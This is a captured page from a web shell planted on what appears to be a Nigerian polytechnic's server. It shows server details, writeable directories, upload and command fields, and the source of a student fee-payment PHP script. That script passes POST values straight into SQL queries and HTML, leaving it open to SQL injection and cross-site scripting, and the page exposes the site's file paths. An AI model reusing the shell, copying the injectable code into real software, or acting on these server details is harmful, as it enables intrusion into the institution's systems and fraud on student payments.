403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.71.120.136
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_student/print/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_student/print//processpaymentb.php
<?php 
session_start();
extract($_POST);
$_SESSION['idNo']=$idNo;
include 'remita_constants.php';

$timesammp=DATE("dmyHis");		
//$orderID = $timesammp;
$orderID=mt_rand(1000, 9999).mt_rand(1000, 9999);
$responseurl = PATH . "/receipt-pageb.php";

$ptype1=explode(',',$_POST['ptype']);
$paymentType=$ptype1[0];

$_SESSION['paymentTYPE']=$paymentType;
$_SESSION['orderID']=$orderID;
		if (( $paymentType=="New Transcript Request") or ( $paymentType=="Reprint Transcript") or ( $paymentType=="Additional Reprint Transcript")  or ( $paymentType=="Additional Transcript Payment") ){
			$servicetypeId = SERVICETYPEID_TRA;	 
		}elseif( $paymentType=="Development") {
			$servicetypeId = SERVICETYPEID_DEV;
		}elseif( $paymentType=="Certificate Levy") {
			$servicetypeId = SERVICETYPEID_CER;
		}elseif( $paymentType=="Accommodation") {
			$servicetypeId = SERVICETYPEID_ACC;
		}elseif( $paymentType=="Student Association/Club Reg.") {
			$servicetypeId = SERVICETYPEID_STU;
		}elseif( $paymentType=="JAMB Regularization") {
			$servicetypeId = SERVICETYPEID_JAM;
		}elseif( $paymentType=="Additional JAMB Regularization") {
			$servicetypeId = SERVICETYPEID_JAM;
		}elseif( $paymentType=="Refund of Advances") {
			$servicetypeId = SERVICETYPEID_REF;
		}elseif( $paymentType=="Other Payments") {
			$servicetypeId = SERVICETYPEID_OTH;
		}elseif( $paymentType=="Change of Course Fee") {
			$servicetypeId = SERVICETYPEID_COC;
		}elseif( $paymentType=="Late Registration Penalty Charges") {
			$servicetypeId = SERVICETYPEID_LRF;
			//Created on = 01/03/2016-4:48pm
		}elseif( $paymentType=="Lost of Item Penalty") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Lost of School Receipt") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Verification of result") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Re-Notification of Result") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Refund of Turning Advance") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Refund of Cash Advance") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Registration of contractor") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Rentage of Hall") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Sales of Boarded Items") {
            $servicetypeId = SERVICETYPEID_OTH;
        }elseif( $paymentType=="Tender Fee") {
            $servicetypeId = SERVICETYPEID_OTH;
        }

$concatString = MERCHANTID . $servicetypeId . $orderID . $amt . $responseurl . APIKEY;
$hash = hash('sha512', $concatString);
//$paymentType='Acceptance Fee';
?>
<html>
<p>You will be redirected to Remita in few seconds.......</p>

<form action="<?php echo GATEWAYURL; ?>" id="remita_form" name="remita_form" method="POST">
<input id="merchantId" name="merchantId" value="<?php echo MERCHANTID; ?>" type="hidden"/>
<input id="serviceTypeId" name="serviceTypeId" value="<?php echo $servicetypeId; ?>" type="hidden"/>
<input id="amt" name="amt" value="<?php echo $amt; ?>" type="hidden"/>
<input id="responseurl" name="responseurl" value="<?php echo $responseurl; ?>" type="hidden"/>
<input id="hash" name="hash" value="<?php echo $hash; ?>" type="hidden"/>
<input id="payerName" name="payerName" value="<?php echo $payerName; ?>" type="hidden"/>
<input id="paymenttype" name="paymenttype" value="<?php echo $paymenttype; ?>" type="hidden"/>
<input id="payerEmail" name="payerEmail" value="<?php echo $payerEmail; ?>" type="hidden"/>
<input id="payerPhone" name="payerPhone" value="<?php echo $payerPhone; ?>" type="hidden"/>
<input id="orderId" name="orderId" value="<?php echo $orderID; ?>" type="hidden"/>
</form>
<?php
require('../connect.php');
$db=db_connect();
require('../filetoU/logFile.php');
$logD='OrderID: '.$orderID.' PaymentType: '.$paymentType;
logDetail($idNo,$logD);
		 $ip2=$_SERVER['HTTP_X_FORWARDED_FOR'];
		 $ip1=$_SERVER['REMOTE_ADDR'];
		 
		 $ptype1=explode(',',$_POST['ptype']);
$ptype=$ptype1[0];

$db->query("INSERT INTO `fedpoly`.`remitaorder` (`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`,`descr`,`pay_session`) VALUES (NULL, '$orderID', '0', '0', '-1', '$idNo', 'Not Yet Approved', '$amt', '$ptype', 'False','$ip1','$ip2','$desc','2017/2018')");

$sql="select * from otherpayment where idNo='$idNo'";
$result=$db->query($sql);
$num=$result->rowCount();
if ($num>0){
	$db->query("UPDATE `fedpoly`.`otherpayment` SET `names` = '$payerName',
`email` = '$payerEmail',
`phone` = '$payerPhone',
`descr` = '$desc',
`orderID` = '$orderID' WHERE `otherpayment`.`idNo` ='$idNo' and (`names`='' OR `names`='.')");
}else{
	$payerName=str_replace("'","''",$payerName);
$db->query("INSERT INTO `fedpoly`.`otherpayment` (`sn`, `idNo`, `names`, `email`, `phone`,`descr`,`orderID`) VALUES (NULL, '$idNo', '$payerName', '$payerEmail', '$payerPhone','$desc','$orderID')");
} 
//die($ptype);
?>
<script type="text/javascript">document.getElementById("remita_form").submit();</script>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit